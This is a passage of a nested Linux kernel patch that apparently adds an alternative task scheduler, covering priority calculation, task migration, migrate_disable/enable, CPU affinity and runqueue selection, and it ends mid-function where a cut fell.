++#endif /* CONFIG_SMP */
++
++static void hrtick_rq_init(struct rq *rq)
++{
++#ifdef CONFIG_SMP
++	INIT_CSD(&rq->hrtick_csd, __hrtick_start, rq);
++#endif
++
++	hrtimer_init(&rq->hrtick_timer, CLOCK_MONOTONIC, HRTIMER_MODE_REL_HARD);
++	rq->hrtick_timer.function = hrtick;
++}
++#else	/* CONFIG_SCHED_HRTICK */
++static inline int hrtick_enabled(struct rq *rq)
++{
++	return 0;
++}
++
++static inline void hrtick_clear(struct rq *rq)
++{
++}
++
++static inline void hrtick_rq_init(struct rq *rq)
++{
++}
++#endif	/* CONFIG_SCHED_HRTICK */
++
++static inline int __normal_prio(int policy, int rt_prio, int static_prio)
++{
++	return rt_policy(policy) ? (MAX_RT_PRIO - 1 - rt_prio) :
++		static_prio + MAX_PRIORITY_ADJ;
++}
++
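++/*
++ * Example mapping: a SCHED_FIFO task with rt_priority 1 maps to
++ * MAX_RT_PRIO - 2, while a nice-0 SCHED_NORMAL task (static_prio ==
++ * DEFAULT_PRIO) maps to DEFAULT_PRIO + MAX_PRIORITY_ADJ, matching the
++ * init_task values set in init/init_task.c earlier in this patch.
++ */
++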
++/*
++ * Calculate the expected normal priority: i.e. priority
++ * without taking RT-inheritance into account. Might be
++ * boosted by interactivity modifiers. Changes upon fork,
++ * setprio syscalls, and whenever the interactivity
++ * estimator recalculates.
++ */
++static inline int normal_prio(struct task_struct *p)
++{
++	return __normal_prio(p->policy, p->rt_priority, p->static_prio);
++}
++
++/*
++ * Calculate the current priority, i.e. the priority
++ * taken into account by the scheduler. This value might
++ * be boosted by RT tasks as it will be RT if the task got
++ * RT-boosted. If not then it returns p->normal_prio.
++ */
++static int effective_prio(struct task_struct *p)
++{
++	p->normal_prio = normal_prio(p);
++	/*
++	 * If we are RT tasks or we were boosted to RT priority,
++	 * keep the priority unchanged. Otherwise, update priority
++	 * to the normal priority:
++	 */
++	if (!rt_prio(p->prio))
++		return p->normal_prio;
++	return p->prio;
++}
++
++/*
++ * activate_task - move a task to the runqueue.
++ *
++ * Context: rq->lock
++ */
++static void activate_task(struct task_struct *p, struct rq *rq)
++{
++	enqueue_task(p, rq, ENQUEUE_WAKEUP);
++	p->on_rq = TASK_ON_RQ_QUEUED;
++
++	/*
++	 * If in_iowait is set, the code below may not trigger any cpufreq
++	 * utilization updates, so do it here explicitly with the IOWAIT flag
++	 * passed.
++	 */
++	cpufreq_update_util(rq, SCHED_CPUFREQ_IOWAIT * p->in_iowait);
++}
++
++/*
++ * deactivate_task - remove a task from the runqueue.
++ *
++ * Context: rq->lock
++ */
++static inline void deactivate_task(struct task_struct *p, struct rq *rq)
++{
++	dequeue_task(p, rq, DEQUEUE_SLEEP);
++	p->on_rq = 0;
++	cpufreq_update_util(rq, 0);
++}
++
++static inline void __set_task_cpu(struct task_struct *p, unsigned int cpu)
++{
++#ifdef CONFIG_SMP
++	/*
++	 * After ->cpu is set up to a new value, task_access_lock(p, ...) can be
++	 * successfully executed on another CPU. We must ensure that updates of
++	 * per-task data have been completed by this moment.
++	 */
++	smp_wmb();
++
++	WRITE_ONCE(task_thread_info(p)->cpu, cpu);
++#endif
++}
++
++static inline bool is_migration_disabled(struct task_struct *p)
++{
++#ifdef CONFIG_SMP
++	return p->migration_disabled;
++#else
++	return false;
++#endif
++}
++
++#define SCA_CHECK		0x01
++#define SCA_USER		0x08
++
++#ifdef CONFIG_SMP
++
++void set_task_cpu(struct task_struct *p, unsigned int new_cpu)
++{
++#ifdef CONFIG_SCHED_DEBUG
++	unsigned int state = READ_ONCE(p->__state);
++
++	/*
++	 * We should never call set_task_cpu() on a blocked task,
++	 * ttwu() will sort out the placement.
++	 */
++	WARN_ON_ONCE(state != TASK_RUNNING && state != TASK_WAKING && !p->on_rq);
++
++#ifdef CONFIG_LOCKDEP
++	/*
++	 * The caller should hold either p->pi_lock or rq->lock, when changing
++	 * a task's CPU. ->pi_lock for waking tasks, rq->lock for runnable tasks.
++	 *
++	 * sched_move_task() holds both and thus holding either pins the cgroup,
++	 * see task_group().
++	 */
++	WARN_ON_ONCE(debug_locks && !(lockdep_is_held(&p->pi_lock) ||
++				      lockdep_is_held(&task_rq(p)->lock)));
++#endif
++	/*
++	 * Clearly, migrating tasks to offline CPUs is a fairly daft thing.
++	 */
++	WARN_ON_ONCE(!cpu_online(new_cpu));
++
++	WARN_ON_ONCE(is_migration_disabled(p));
++#endif
++	trace_sched_migrate_task(p, new_cpu);
++
++	if (task_cpu(p) != new_cpu) {
++		rseq_migrate(p);
++		perf_event_task_migrate(p);
++	}
++
++	__set_task_cpu(p, new_cpu);
++}
++
++#define MDF_FORCE_ENABLED	0x80
++
++static void
++__do_set_cpus_ptr(struct task_struct *p, const struct cpumask *new_mask)
++{
++	/*
++	 * This here violates the locking rules for affinity, since we're only
++	 * supposed to change these variables while holding both rq->lock and
++	 * p->pi_lock.
++	 *
++	 * HOWEVER, it magically works, because ttwu() is the only code that
++	 * accesses these variables under p->pi_lock and only does so after
++	 * smp_cond_load_acquire(&p->on_cpu, !VAL), and we're in __schedule()
++	 * before finish_task().
++	 *
++	 * XXX do further audits, this smells like something putrid.
++	 */
++	SCHED_WARN_ON(!p->on_cpu);
++	p->cpus_ptr = new_mask;
++}
++
++void migrate_disable(void)
++{
++	struct task_struct *p = current;
++	int cpu;
++
++	if (p->migration_disabled) {
++		p->migration_disabled++;
++		return;
++	}
++
++	preempt_disable();
++	cpu = smp_processor_id();
++	if (cpumask_test_cpu(cpu, &p->cpus_mask)) {
++		cpu_rq(cpu)->nr_pinned++;
++		p->migration_disabled = 1;
++		p->migration_flags &= ~MDF_FORCE_ENABLED;
++
++		/*
++		 * Violates locking rules! see comment in __do_set_cpus_ptr().
++		 */
++		if (p->cpus_ptr == &p->cpus_mask)
++			__do_set_cpus_ptr(p, cpumask_of(cpu));
++	}
++	preempt_enable();
++}
++EXPORT_SYMBOL_GPL(migrate_disable);
++
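++/*
++ * migrate_disable()/migrate_enable() nest: only the outermost
++ * migrate_disable() pins the task, by pointing cpus_ptr at the current
++ * CPU's single-bit mask; nested calls merely adjust the counter, and
++ * only the matching outermost migrate_enable() undoes the pinning.
++ */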
++void migrate_enable(void)
++{
++	struct task_struct *p = current;
++
++	if (0 == p->migration_disabled)
++		return;
++
++	if (p->migration_disabled > 1) {
++		p->migration_disabled--;
++		return;
++	}
++
++	if (WARN_ON_ONCE(!p->migration_disabled))
++		return;
++
++	/*
++	 * Ensure stop_task runs either before or after this, and that
++	 * __set_cpus_allowed_ptr(SCA_MIGRATE_ENABLE) doesn't schedule().
++	 */
++	preempt_disable();
++	/*
++	 * Assumption: current should be running on allowed cpu
++	 */
++	WARN_ON_ONCE(!cpumask_test_cpu(smp_processor_id(), &p->cpus_mask));
++	if (p->cpus_ptr != &p->cpus_mask)
++		__do_set_cpus_ptr(p, &p->cpus_mask);
++	/*
++	 * Mustn't clear migration_disabled() until cpus_ptr points back at the
++	 * regular cpus_mask, otherwise things that race (eg.
++	 * select_fallback_rq) get confused.
++	 */
++	barrier();
++	p->migration_disabled = 0;
++	this_rq()->nr_pinned--;
++	preempt_enable();
++}
++EXPORT_SYMBOL_GPL(migrate_enable);
++
++static inline bool rq_has_pinned_tasks(struct rq *rq)
++{
++	return rq->nr_pinned;
++}
++
++/*
++ * Per-CPU kthreads are allowed to run on !active && online CPUs, see
++ * __set_cpus_allowed_ptr() and select_fallback_rq().
++ */
++static inline bool is_cpu_allowed(struct task_struct *p, int cpu)
++{
++	/* When not in the task's cpumask, no point in looking further. */
++	if (!cpumask_test_cpu(cpu, p->cpus_ptr))
++		return false;
++
++	/* migrate_disabled() must be allowed to finish. */
++	if (is_migration_disabled(p))
++		return cpu_online(cpu);
++
++	/* Non-kernel threads are not allowed during either online or offline. */
++	if (!(p->flags & PF_KTHREAD))
++		return cpu_active(cpu) && task_cpu_possible(cpu, p);
++
++	/* KTHREAD_IS_PER_CPU is always allowed. */
++	if (kthread_is_per_cpu(p))
++		return cpu_online(cpu);
++
++	/* Regular kernel threads don't get to stay during offline. */
++	if (cpu_dying(cpu))
++		return false;
++
++	/* But are allowed during online. */
++	return cpu_online(cpu);
++}
++
++/*
++ * This is how migration works:
++ *
++ * 1) we invoke migration_cpu_stop() on the target CPU using
++ *    stop_one_cpu().
++ * 2) stopper starts to run (implicitly forcing the migrated thread
++ *    off the CPU)
++ * 3) it checks whether the migrated task is still in the wrong runqueue.
++ * 4) if it's in the wrong runqueue then the migration thread removes
++ *    it and puts it into the right queue.
++ * 5) stopper completes and stop_one_cpu() returns and the migration
++ *    is done.
++ */
++
++/*
++ * move_queued_task - move a queued task to new rq.
++ *
++ * Returns (locked) new rq. Old rq's lock is released.
++ */
++static struct rq *move_queued_task(struct rq *rq, struct task_struct *p, int
++				   new_cpu)
++{
++	lockdep_assert_held(&rq->lock);
++
++	WRITE_ONCE(p->on_rq, TASK_ON_RQ_MIGRATING);
++	dequeue_task(p, rq, 0);
++	update_sched_preempt_mask(rq);
++	set_task_cpu(p, new_cpu);
++	raw_spin_unlock(&rq->lock);
++
++	rq = cpu_rq(new_cpu);
++
++	raw_spin_lock(&rq->lock);
++	WARN_ON_ONCE(task_cpu(p) != new_cpu);
++	sched_task_sanity_check(p, rq);
++	enqueue_task(p, rq, 0);
++	p->on_rq = TASK_ON_RQ_QUEUED;
++	check_preempt_curr(rq);
++
++	return rq;
++}
++
++struct migration_arg {
++	struct task_struct *task;
++	int dest_cpu;
++};
++
++/*
++ * Move (not current) task off this CPU, onto the destination CPU. We're doing
++ * this because either it can't run here any more (set_cpus_allowed()
++ * away from this CPU, or CPU going down), or because we're
++ * attempting to rebalance this task on exec (sched_exec).
++ *
++ * So we race with normal scheduler movements, but that's OK, as long
++ * as the task is no longer on this CPU.
++ */
++static struct rq *__migrate_task(struct rq *rq, struct task_struct *p, int
++				 dest_cpu)
++{
++	/* Affinity changed (again). */
++	if (!is_cpu_allowed(p, dest_cpu))
++		return rq;
++
++	update_rq_clock(rq);
++	return move_queued_task(rq, p, dest_cpu);
++}
++
++/*
++ * migration_cpu_stop - this will be executed by a highprio stopper thread
++ * and performs thread migration by bumping thread off CPU then
++ * 'pushing' onto another runqueue.
++ */
++static int migration_cpu_stop(void *data)
++{
++	struct migration_arg *arg = data;
++	struct task_struct *p = arg->task;
++	struct rq *rq = this_rq();
++	unsigned long flags;
++
++	/*
++	 * The original target CPU might have gone down and we might
++	 * be on another CPU but it doesn't matter.
++	 */
++	local_irq_save(flags);
++	/*
++	 * We need to explicitly wake pending tasks before running
++	 * __migrate_task() such that we will not miss enforcing cpus_ptr
++	 * during wakeups, see set_cpus_allowed_ptr()'s TASK_WAKING test.
++	 */
++	flush_smp_call_function_queue();
++
++	raw_spin_lock(&p->pi_lock);
++	raw_spin_lock(&rq->lock);
++	/*
++	 * If task_rq(p) != rq, it cannot be migrated here, because we're
++	 * holding rq->lock, if p->on_rq == 0 it cannot get enqueued because
++	 * we're holding p->pi_lock.
++	 */
++	if (task_rq(p) == rq && task_on_rq_queued(p))
++		rq = __migrate_task(rq, p, arg->dest_cpu);
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++
++	return 0;
++}
++
++static inline void
++set_cpus_allowed_common(struct task_struct *p, const struct cpumask *new_mask)
++{
++	cpumask_copy(&p->cpus_mask, new_mask);
++	p->nr_cpus_allowed = cpumask_weight(new_mask);
++}
++
++static void
++__do_set_cpus_allowed(struct task_struct *p, const struct cpumask *new_mask)
++{
++	lockdep_assert_held(&p->pi_lock);
++	set_cpus_allowed_common(p, new_mask);
++}
++
++void do_set_cpus_allowed(struct task_struct *p, const struct cpumask *new_mask)
++{
++	__do_set_cpus_allowed(p, new_mask);
++}
++
++int dup_user_cpus_ptr(struct task_struct *dst, struct task_struct *src,
++		      int node)
++{
++	if (!src->user_cpus_ptr)
++		return 0;
++
++	dst->user_cpus_ptr = kmalloc_node(cpumask_size(), GFP_KERNEL, node);
++	if (!dst->user_cpus_ptr)
++		return -ENOMEM;
++
++	cpumask_copy(dst->user_cpus_ptr, src->user_cpus_ptr);
++	return 0;
++}
++
++static inline struct cpumask *clear_user_cpus_ptr(struct task_struct *p)
++{
++	struct cpumask *user_mask = NULL;
++
++	swap(p->user_cpus_ptr, user_mask);
++
++	return user_mask;
++}
++
++void release_user_cpus_ptr(struct task_struct *p)
++{
++	kfree(clear_user_cpus_ptr(p));
++}
++
++#endif
++
++/**
++ * task_curr - is this task currently executing on a CPU?
++ * @p: the task in question.
++ *
++ * Return: 1 if the task is currently executing. 0 otherwise.
++ */
++inline int task_curr(const struct task_struct *p)
++{
++	return cpu_curr(task_cpu(p)) == p;
++}
++
++#ifdef CONFIG_SMP
++/*
++ * wait_task_inactive - wait for a thread to unschedule.
++ *
++ * Wait for the thread to block in any of the states set in @match_state.
++ * If it changes, i.e. @p might have woken up, then return zero.  When we
++ * succeed in waiting for @p to be off its CPU, we return a positive number
++ * (its total switch count).  If a second call a short while later returns the
++ * same number, the caller can be sure that @p has remained unscheduled the
++ * whole time.
++ *
++ * The caller must ensure that the task *will* unschedule sometime soon,
++ * else this function might spin for a *long* time. This function can't
++ * be called with interrupts off, or it may introduce deadlock with
++ * smp_call_function() if an IPI is sent by the same process we are
++ * waiting to become inactive.
++ */
++unsigned long wait_task_inactive(struct task_struct *p, unsigned int match_state)
++{
++	unsigned long flags;
++	bool running, on_rq;
++	unsigned long ncsw;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++
++	for (;;) {
++		rq = task_rq(p);
++
++		/*
++		 * If the task is actively running on another CPU
++		 * still, just relax and busy-wait without holding
++		 * any locks.
++		 *
++		 * NOTE! Since we don't hold any locks, it's not
++		 * even sure that "rq" stays as the right runqueue!
++		 * But we don't care, since this will return false
++		 * if the runqueue has changed and p is actually now
++		 * running somewhere else!
++		 */
++		while (task_on_cpu(p) && p == rq->curr) {
++			if (!(READ_ONCE(p->__state) & match_state))
++				return 0;
++			cpu_relax();
++		}
++
++		/*
++		 * Ok, time to look more closely! We need the rq
++		 * lock now, to be *sure*. If we're wrong, we'll
++		 * just go back and repeat.
++		 */
++		task_access_lock_irqsave(p, &lock, &flags);
++		trace_sched_wait_task(p);
++		running = task_on_cpu(p);
++		on_rq = p->on_rq;
++		ncsw = 0;
++		if (READ_ONCE(p->__state) & match_state)
++			ncsw = p->nvcsw | LONG_MIN; /* sets MSB */
++		task_access_unlock_irqrestore(p, lock, &flags);
++
++		/*
++		 * If it changed from the expected state, bail out now.
++		 */
++		if (unlikely(!ncsw))
++			break;
++
++		/*
++		 * Was it really running after all now that we
++		 * checked with the proper locks actually held?
++		 *
++		 * Oops. Go back and try again..
++		 */
++		if (unlikely(running)) {
++			cpu_relax();
++			continue;
++		}
++
++		/*
++		 * It's not enough that it's not actively running,
++		 * it must be off the runqueue _entirely_, and not
++		 * preempted!
++		 *
++		 * So if it was still runnable (but just not actively
++		 * running right now), it's preempted, and we should
++		 * yield - it could be a while.
++		 */
++		if (unlikely(on_rq)) {
++			ktime_t to = NSEC_PER_SEC / HZ;
++
++			set_current_state(TASK_UNINTERRUPTIBLE);
++			schedule_hrtimeout(&to, HRTIMER_MODE_REL_HARD);
++			continue;
++		}
++
++		/*
++		 * Ahh, all good. It wasn't running, and it wasn't
++		 * runnable, which means that it will never become
++		 * running in the future either. We're all done!
++		 */
++		break;
++	}
++
++	return ncsw;
++}
++
++/***
++ * kick_process - kick a running thread to enter/exit the kernel
++ * @p: the to-be-kicked thread
++ *
++ * Cause a process which is running on another CPU to enter
++ * kernel-mode, without any delay. (to get signals handled.)
++ *
++ * NOTE: this function doesn't have to take the runqueue lock,
++ * because all it wants to ensure is that the remote task enters
++ * the kernel. If the IPI races and the task has been migrated
++ * to another CPU then no harm is done and the purpose has been
++ * achieved as well.
++ */
++void kick_process(struct task_struct *p)
++{
++	int cpu;
++
++	preempt_disable();
++	cpu = task_cpu(p);
++	if ((cpu != smp_processor_id()) && task_curr(p))
++		smp_send_reschedule(cpu);
++	preempt_enable();
++}
++EXPORT_SYMBOL_GPL(kick_process);
++
++/*
++ * ->cpus_ptr is protected by both rq->lock and p->pi_lock
++ *
++ * A few notes on cpu_active vs cpu_online:
++ *
++ *  - cpu_active must be a subset of cpu_online
++ *
++ *  - on CPU-up we allow per-CPU kthreads on the online && !active CPU,
++ *    see __set_cpus_allowed_ptr(). At this point the newly online
++ *    CPU isn't yet part of the sched domains, and balancing will not
++ *    see it.
++ *
++ *  - on cpu-down we clear cpu_active() to mask the sched domains and
++ *    keep the load balancer from placing new tasks on the to-be-removed
++ *    CPU. Existing tasks will remain running there and will be taken
++ *    off.
++ *
++ * This means that fallback selection must not select !active CPUs.
++ * And can assume that any active CPU must be online. Conversely
++ * select_task_rq() below may allow selection of !active CPUs in order
++ * to satisfy the above rules.
++ */
++static int select_fallback_rq(int cpu, struct task_struct *p)
++{
++	int nid = cpu_to_node(cpu);
++	const struct cpumask *nodemask = NULL;
++	enum { cpuset, possible, fail } state = cpuset;
++	int dest_cpu;
++
++	/*
++	 * If the node that the CPU is on has been offlined, cpu_to_node()
++	 * will return -1. There is no CPU on the node, and we should
++	 * select the CPU on the other node.
++	 */
++	if (nid != -1) {
++		nodemask = cpumask_of_node(nid);
++
++		/* Look for allowed, online CPU in same node. */
++		for_each_cpu(dest_cpu, nodemask) {
++			if (is_cpu_allowed(p, dest_cpu))
++				return dest_cpu;
++		}
++	}
++
++	for (;;) {
++		/* Any allowed, online CPU? */
++		for_each_cpu(dest_cpu, p->cpus_ptr) {
++			if (!is_cpu_allowed(p, dest_cpu))
++				continue;
++			goto out;
++		}
++
++		/* No more Mr. Nice Guy. */
++		switch (state) {
++		case cpuset:
++			if (cpuset_cpus_allowed_fallback(p)) {
++				state = possible;
++				break;
++			}
++			fallthrough;
++		case possible:
++			/*
++			 * XXX When called from select_task_rq() we only
++			 * hold p->pi_lock and again violate locking order.
++			 *
++			 * More yuck to audit.
++			 */
++			do_set_cpus_allowed(p, task_cpu_possible_mask(p));
++			state = fail;
++			break;
++
++		case fail:
++			BUG();
++			break;
++		}
++	}
++
++out:
++	if (state != cpuset) {
++		/*
++		 * Don't tell them about moving exiting tasks or
++		 * kernel threads (both mm NULL), since they never
++		 * leave the kernel.
++		 */
++		if (p->mm && printk_ratelimit()) {
++			printk_deferred("process %d (%s) no longer affine to cpu%d\n",
++					task_pid_nr(p), p->comm, cpu);
++		}
++	}
++
++	return dest_cpu;
++}
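++
++/*
++ * For example, if a user task's last allowed CPU is unplugged and the
++ * cpuset fallback already widened the mask, the ratelimited message
++ * produced above would read (PID, name and CPU illustrative):
++ *
++ *	process 1234 (myapp) no longer affine to cpu2
++ */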
++
++static inline void
++sched_preempt_mask_flush(cpumask_t *mask, int prio)
++{
++	int cpu;
++
++	cpumask_copy(mask, sched_idle_mask);
++
++	for_each_cpu_not(cpu, mask) {
++		if (prio < cpu_rq(cpu)->prio)
++			cpumask_set_cpu(cpu, mask);
++	}
++}
++
++static inline int
++preempt_mask_check(struct task_struct *p, cpumask_t *allow_mask, cpumask_t *preempt_mask)
++{
++	int task_prio = task_sched_prio(p);
++	cpumask_t *mask = sched_preempt_mask + SCHED_QUEUE_BITS - 1 - task_prio;
++	int pr = atomic_read(&sched_prio_record);
++
++	if (pr != task_prio) {
++		sched_preempt_mask_flush(mask, task_prio);
++		atomic_set(&sched_prio_record, task_prio);
++	}
++
++	return cpumask_and(preempt_mask, allow_mask, mask);
++}
++
++static inline int select_task_rq(struct task_struct *p)
++{
++	cpumask_t allow_mask, mask;
++
++	if (unlikely(!cpumask_and(&allow_mask, p->cpus_ptr, cpu_active_mask)))
++		return select_fallback_rq(task_cpu(p), p);
++
++	if (
++#ifdef CONFIG_SCHED_SMT
++	    cpumask_and(&mask, &allow_mask, &sched_sg_idle_mask) ||
++#endif
++	    cpumask_and(&mask, &allow_mask, sched_idle_mask) ||
++	    preempt_mask_check(p, &allow_mask, &mask))
++		return best_mask_cpu(task_cpu(p), &mask);
++
++	return best_mask_cpu(task_cpu(p), &allow_mask);
++}
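++
++/*
++ * Worked example (illustrative): for a wakee allowed on CPUs {2,3},
++ * the selection above proceeds in priority order -- an allowed CPU
++ * whose whole SMT sibling group is idle (if CONFIG_SCHED_SMT), then
++ * any allowed idle CPU, then an allowed CPU running lower-priority
++ * work, and finally any allowed CPU; best_mask_cpu() then picks the
++ * candidate closest to task_cpu(p) in the topology.
++ */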
++
++void sched_set_stop_task(int cpu, struct task_struct *stop)
++{
++	static struct lock_class_key stop_pi_lock;
++	struct sched_param stop_param = { .sched_priority = STOP_PRIO };
++	struct sched_param start_param = { .sched_priority = 0 };
++	struct task_struct *old_stop = cpu_rq(cpu)->stop;
++
++	if (stop) {
++		/*
++		 * Make it appear like a SCHED_FIFO task, it's something
++		 * userspace knows about and won't get confused about.
++		 *
++		 * Also, it will make PI more or less work without too
++		 * much confusion -- but then, stop work should not
++		 * rely on PI working anyway.
++		 */
++		sched_setscheduler_nocheck(stop, SCHED_FIFO, &stop_param);
++
++		/*
++		 * The PI code calls rt_mutex_setprio() with ->pi_lock held to
++		 * adjust the effective priority of a task. As a result,
++		 * rt_mutex_setprio() can trigger (RT) balancing operations,
++		 * which can then trigger wakeups of the stop thread to push
++		 * around the current task.
++		 *
++		 * The stop task itself will never be part of the PI-chain, it
++		 * never blocks, therefore that ->pi_lock recursion is safe.
++		 * Tell lockdep about this by placing the stop->pi_lock in its
++		 * own class.
++		 */
++		lockdep_set_class(&stop->pi_lock, &stop_pi_lock);
++	}
++
++	cpu_rq(cpu)->stop = stop;
++
++	if (old_stop) {
++		/*
++		 * Reset it back to a normal scheduling policy so that
++		 * it can die in peace.
++		 */
++		sched_setscheduler_nocheck(old_stop, SCHED_NORMAL, &start_param);
++	}
++}
++
++static int affine_move_task(struct rq *rq, struct task_struct *p, int dest_cpu,
++			    raw_spinlock_t *lock, unsigned long irq_flags)
++{
++	/* Can the task run on the task's current CPU? If so, we're done */
++	if (!cpumask_test_cpu(task_cpu(p), &p->cpus_mask)) {
++		if (p->migration_disabled) {
++			if (likely(p->cpus_ptr != &p->cpus_mask))
++				__do_set_cpus_ptr(p, &p->cpus_mask);
++			p->migration_disabled = 0;
++			p->migration_flags |= MDF_FORCE_ENABLED;
++			/* When p is migrate_disabled, rq->lock should be held */
++			rq->nr_pinned--;
++		}
++
++		if (task_on_cpu(p) || READ_ONCE(p->__state) == TASK_WAKING) {
++			struct migration_arg arg = { p, dest_cpu };
++
++			/* Need help from migration thread: drop lock and wait. */
++			__task_access_unlock(p, lock);
++			raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
++			stop_one_cpu(cpu_of(rq), migration_cpu_stop, &arg);
++			return 0;
++		}
++		if (task_on_rq_queued(p)) {
++			/*
++			 * OK, since we're going to drop the lock immediately
++			 * afterwards anyway.
++			 */
++			update_rq_clock(rq);
++			rq = move_queued_task(rq, p, dest_cpu);
++			lock = &rq->lock;
++		}
++	}
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
++	return 0;
++}
++
++static int __set_cpus_allowed_ptr_locked(struct task_struct *p,
++					 const struct cpumask *new_mask,
++					 u32 flags,
++					 struct rq *rq,
++					 raw_spinlock_t *lock,
++					 unsigned long irq_flags)
++{
++	const struct cpumask *cpu_allowed_mask = task_cpu_possible_mask(p);
++	const struct cpumask *cpu_valid_mask = cpu_active_mask;
++	bool kthread = p->flags & PF_KTHREAD;
++	struct cpumask *user_mask = NULL;
++	int dest_cpu;
++	int ret = 0;
++
++	if (kthread || is_migration_disabled(p)) {
++		/*
++		 * Kernel threads are allowed on online && !active CPUs,
++		 * however, during cpu-hot-unplug, even these might get pushed
++		 * away if not KTHREAD_IS_PER_CPU.
++		 *
++		 * Specifically, migration_disabled() tasks must not fail the
++		 * cpumask_any_and_distribute() pick below, esp. so on
++		 * SCA_MIGRATE_ENABLE, otherwise we'll not call
++		 * set_cpus_allowed_common() and actually reset p->cpus_ptr.
++		 */
++		cpu_valid_mask = cpu_online_mask;
++	}
++
++	if (!kthread && !cpumask_subset(new_mask, cpu_allowed_mask)) {
++		ret = -EINVAL;
++		goto out;
++	}
++
++	/*
++	 * Must re-check here, to close a race against __kthread_bind(),
++	 * sched_setaffinity() is not guaranteed to observe the flag.
++	 */
++	if ((flags & SCA_CHECK) && (p->flags & PF_NO_SETAFFINITY)) {
++		ret = -EINVAL;
++		goto out;
++	}
++
++	if (cpumask_equal(&p->cpus_mask, new_mask))
++		goto out;
++
++	dest_cpu = cpumask_any_and(cpu_valid_mask, new_mask);
++	if (dest_cpu >= nr_cpu_ids) {
++		ret = -EINVAL;
++		goto out;
++	}
++
++	__do_set_cpus_allowed(p, new_mask);
++
++	if (flags & SCA_USER)
++		user_mask = clear_user_cpus_ptr(p);
++
++	ret = affine_move_task(rq, p, dest_cpu, lock, irq_flags);
++
++	kfree(user_mask);
++
++	return ret;
++
++out:
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
++
++	return ret;
++}
++
++/*
++ * Change a given task's CPU affinity. Migrate the thread to a
++ * proper CPU and schedule it away if the CPU it's executing on
++ * is removed from the allowed bitmask.
++ *
++ * NOTE: the caller must have a valid reference to the task, the
++ * task must not exit() & deallocate itself prematurely. The
++ * call is not atomic; no spinlocks may be held.
++ */
++static int __set_cpus_allowed_ptr(struct task_struct *p,
++				  const struct cpumask *new_mask, u32 flags)
++{
++	unsigned long irq_flags;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++
++	raw_spin_lock_irqsave(&p->pi_lock, irq_flags);
++	rq = __task_access_lock(p, &lock);
++
++	return __set_cpus_allowed_ptr_locked(p, new_mask, flags, rq, lock, irq_flags);
++}
++
++int set_cpus_allowed_ptr(struct task_struct *p, const struct cpumask *new_mask)
++{
++	return __set_cpus_allowed_ptr(p, new_mask, 0);
++}
++EXPORT_SYMBOL_GPL(set_cpus_allowed_ptr);
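++
++/*
++ * Minimal usage sketch (illustrative, not part of this patch): pin a
++ * freshly created kthread to one CPU before its first wakeup;
++ * worker_fn and the CPU number are assumptions for the example:
++ *
++ *	struct task_struct *t = kthread_create(worker_fn, NULL, "worker/2");
++ *
++ *	if (!IS_ERR(t)) {
++ *		set_cpus_allowed_ptr(t, cpumask_of(2));
++ *		wake_up_process(t);
++ *	}
++ */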
++
++/*
++ * Change a given task's CPU affinity to the intersection of its current
++ * affinity mask and @subset_mask, writing the resulting mask to @new_mask
++ * and pointing @p->user_cpus_ptr to a copy of the old mask.
++ * If the resulting mask is empty, leave the affinity unchanged and return
++ * -EINVAL.
++ */
++static int restrict_cpus_allowed_ptr(struct task_struct *p,
++				     struct cpumask *new_mask,
++				     const struct cpumask *subset_mask)
++{
++	struct cpumask *user_mask = NULL;
++	unsigned long irq_flags;
++	raw_spinlock_t *lock;
++	struct rq *rq;
++	int err;
++
++	if (!p->user_cpus_ptr) {
++		user_mask = kmalloc(cpumask_size(), GFP_KERNEL);
++		if (!user_mask)
++			return -ENOMEM;
++	}
++
++	raw_spin_lock_irqsave(&p->pi_lock, irq_flags);
++	rq = __task_access_lock(p, &lock);
++
++	if (!cpumask_and(new_mask, &p->cpus_mask, subset_mask)) {
++		err = -EINVAL;
++		goto err_unlock;
++	}
++
++	/*
++	 * We're about to butcher the task affinity, so keep track of what
++	 * the user asked for in case we're able to restore it later on.
++	 */
++	if (user_mask) {
++		cpumask_copy(user_mask, p->cpus_ptr);
++		p->user_cpus_ptr = user_mask;
++	}
++
++	/*return __set_cpus_allowed_ptr_locked(p, new_mask, 0, rq, &rf);*/
++	return __set_cpus_allowed_ptr_locked(p, new_mask, 0, rq, lock, irq_flags);
++
++err_unlock:
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
++	kfree(user_mask);
++	return err;
++}
++
++/*
++ * Restrict the CPU affinity of task @p so that it is a subset of
++ * task_cpu_possible_mask() and point @p->user_cpus_ptr to a copy of the
++ * old affinity mask. If the resulting mask is empty, we warn and walk
++ * up the cpuset hierarchy until we find a suitable mask.
++ */
++void force_compatible_cpus_allowed_ptr(struct task_struct *p)
++{
++	cpumask_var_t new_mask;
++	const struct cpumask *override_mask = task_cpu_possible_mask(p);
++
++	alloc_cpumask_var(&new_mask, GFP_KERNEL);
++
++	/*
++	 * __migrate_task() can fail silently in the face of concurrent
++	 * offlining of the chosen destination CPU, so take the hotplug
++	 * lock to ensure that the migration succeeds.
++	 */
++	cpus_read_lock();
++	if (!cpumask_available(new_mask))
++		goto out_set_mask;
++
++	if (!restrict_cpus_allowed_ptr(p, new_mask, override_mask))
++		goto out_free_mask;
++
++	/*
++	 * We failed to find a valid subset of the affinity mask for the
++	 * task, so override it based on its cpuset hierarchy.
++	 */
++	cpuset_cpus_allowed(p, new_mask);
++	override_mask = new_mask;
++
++out_set_mask:
++	if (printk_ratelimit()) {
++		printk_deferred("Overriding affinity for process %d (%s) to CPUs %*pbl\n",
++				task_pid_nr(p), p->comm,
++				cpumask_pr_args(override_mask));
++	}
++
++	WARN_ON(set_cpus_allowed_ptr(p, override_mask));
++out_free_mask:
++	cpus_read_unlock();
++	free_cpumask_var(new_mask);
++}
++
++static int
++__sched_setaffinity(struct task_struct *p, const struct cpumask *mask);
++
++/*
++ * Restore the affinity of a task @p which was previously restricted by a
++ * call to force_compatible_cpus_allowed_ptr(). This will clear (and free)
++ * @p->user_cpus_ptr.
++ *
++ * It is the caller's responsibility to serialise this with any calls to
++ * force_compatible_cpus_allowed_ptr(@p).
++ */
++void relax_compatible_cpus_allowed_ptr(struct task_struct *p)
++{
++	struct cpumask *user_mask = p->user_cpus_ptr;
